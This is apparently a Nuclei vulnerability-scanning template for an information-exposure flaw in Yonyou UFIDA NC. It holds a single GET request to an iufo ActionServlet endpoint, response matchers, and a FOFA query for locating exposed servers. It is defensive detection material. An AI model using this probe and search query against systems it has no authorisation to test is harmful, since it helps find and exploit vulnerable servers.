34 lines
1.2 KiB
YAML
34 lines
1.2 KiB
YAML
id: yonyou-nc-info-leak
|
|
|
|
info:
|
|
name: Yonyou UFIDA NC - Information Exposure
|
|
author: SleepingBag945
|
|
severity: medium
|
|
description: |
|
|
After logging in and visiting the address where the information was leaked, you will have permission to upload files. Then just go back to the homepage and view the published content directly.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ
|
|
- https://github.com/zhangzhenfeng/AnyScan/blob/master/AnyScanUI/AnyPoc/data/poc/bugscan/exp%EF%BC%8D2311.py
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="用友-UFIDA-NC
|
|
tags: yonyou,nc,exposure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "iufo/web/images/usericon.gif"
|
|
- "/iufo/web/images/tree/tree_plus.gif"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100ba808960df0e03550d2e5eda2a333ad6a26eaa3bd173d2b3ba85aec8f68d5324022100e76f70ee0cefdda44f1a51fa6b25e5a3c00881bc6ccadb6b7bc1f58af1c68889:922c64590222798bb761d5b6d8e72950 |